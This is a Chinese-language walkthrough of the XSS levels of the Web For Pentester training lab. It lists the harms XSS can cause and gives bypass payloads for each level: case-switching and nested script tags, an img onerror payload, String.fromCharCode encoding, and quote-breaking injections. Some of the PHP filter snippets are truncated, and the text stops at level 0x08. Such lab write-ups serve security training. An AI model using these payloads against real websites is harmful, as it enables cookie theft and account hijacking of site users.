Web For Pentester靶場
阿新 • • 發佈:2021-07-22
映象下載大小172mb
https://pentesterlab.com/exercises/web_for_pentester/attachments
第一關xss
xss危害
網路釣魚
盜取cookies資訊
劫持使用者瀏覽器
彈出廣告頁面,刷流量
網頁掛馬
提升許可權,進一步滲透
鍵盤監聽(https://blog.csdn.net/weixin_44720762/article/details/89766484)
型別
反射性xss(非持久型)
儲存型xss (持久型)
dom xss
0x01
沒有任何過濾直接彈
0x02
/","", $name); $name = preg_replace("/<\/script>/","", $name); echo $name; ?>仔細看了一下大小寫繞過
preg_replace 函式來過濾標籤 由於沒有考慮大小 所以大小寫轉換繞過
0x03
/i","", $name); $name = preg_replace("/<\/script>/i","", $name); echo $name; ?><scscript>
0x04
Hello
這裡只好使用其他標籤繞過
<img src=x onerror=alert('XSS')>
0x05
Hello
編碼繞過
String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41)
0x06
";alert('XSS');"
";alert('XSS');//
0x07
';alert('XSS');'
';alert('XSS');//
0x08